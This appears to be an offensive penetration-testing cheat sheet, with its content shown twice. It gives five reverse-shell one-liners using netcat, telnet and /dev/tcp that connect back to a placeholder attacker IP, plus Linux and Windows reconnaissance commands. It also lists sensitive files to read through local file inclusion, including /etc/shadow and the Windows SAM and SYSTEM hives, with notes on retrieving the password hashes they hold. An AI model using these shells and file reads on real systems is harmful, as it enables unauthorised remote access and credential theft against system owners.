waywardsun

## netcat_reverse_shell_backpipe
#1
nc <attacker_ip> <port> -e /bin/bash
#2
mknod backpipe p; nc <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
#3
/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
#4
mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/bash 1>backpipe
#5
telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>

## linux_privesc
// Determine linux distribution and version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

// Determine kernel version - 32 or 64-bit?
cat /proc/version
uname -a
uname -mrs

## windows_privesc
// What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

// Get the hostname and username (if available)
hostname
echo %username%

// Get users
net users
net user [username]

## linux_blind
# Use these if you have a simple command shell through LFI or something similar.

/etc/issue (A message or system identification to be printed before the login prompt.)
/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
/etc/passwd
/etc/group
/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile

## windows_blind
%SYSTEMDRIVE%\boot.ini
%WINDIR%\win.ini	This is another file that can be counted on to be readable by all users of a system.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM	Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system	This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM	These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
%WINDIR%\repair\sam
%WINDIR%\repair\system
	#1
	nc <attacker_ip> <port> -e /bin/bash
	#2
	mknod backpipe p; nc <attacker_ip> <port> 0<backpipe \| /bin/bash 1>backpipe
	#3
	/bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1
	#4
	mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe \| /bin/bash 1>backpipe
	#5
	telnet <attacker_ip> <1st_port> \| /bin/bash \| telnet <attacker_ip> <2nd_port>
	// Determine linux distribution and version
	cat /etc/issue
	cat /etc/*-release
	cat /etc/lsb-release
	cat /etc/redhat-release

	// Determine kernel version - 32 or 64-bit?
	cat /proc/version
	uname -a
	uname -mrs
	// What system are we connected to?
	systeminfo \| findstr /B /C:"OS Name" /C:"OS Version"

	// Get the hostname and username (if available)
	hostname
	echo %username%

	// Get users
	net users
	net user [username]
	# Use these if you have a simple command shell through LFI or something similar.

	/etc/issue (A message or system identification to be printed before the login prompt.)
	/etc/motd (Message of the day banner content. Can contain information about the system owners or use of the system.)
	/etc/passwd
	/etc/group
	/etc/resolv.conf (might be better than /etc/passwd for triggering IDS sigs)
	/etc/shadow
	/home/[USERNAME]/.bash_history or .profile
	~/.bash_history or .profile
	%SYSTEMDRIVE%\boot.ini
	%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system.
	%SYSTEMROOT%\repair\SAM
	%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
	%SYSTEMROOT%\repair\system
	%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
	%SYSTEMROOT%\repair\SAM
	%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
	%WINDIR%\repair\sam
	%WINDIR%\repair\system